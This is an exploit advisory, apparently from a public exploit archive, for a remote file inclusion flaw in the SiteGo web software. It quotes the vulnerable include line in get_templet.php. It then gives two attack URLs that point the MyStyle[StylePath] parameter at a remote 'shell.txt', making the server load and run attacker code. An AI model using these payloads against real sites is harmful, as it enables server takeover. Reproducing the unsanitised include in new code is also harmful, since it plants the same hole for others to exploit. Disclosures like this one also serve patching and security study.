SiteGo Remote File Inclusion Vulnerability



############################################

### Exploit Title: SiteGo Remote File Inclusion Vulnerability
### Date: 10/09/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://site-go.com/
### Software Link: http://site-go.com/free/site-go.zip
### Tested on: Linux/Windows 
############################################

# File affect in two styles ( get_templet.php ) on line 120:

include "$MyStyle[StylePath]/extra/css_menu.php";

# Examples :

http://127.0.0.1/site-go/style/green/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?

http://127.0.0.1/site-go/style/blue/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?

############################################

# Greetz to my friendz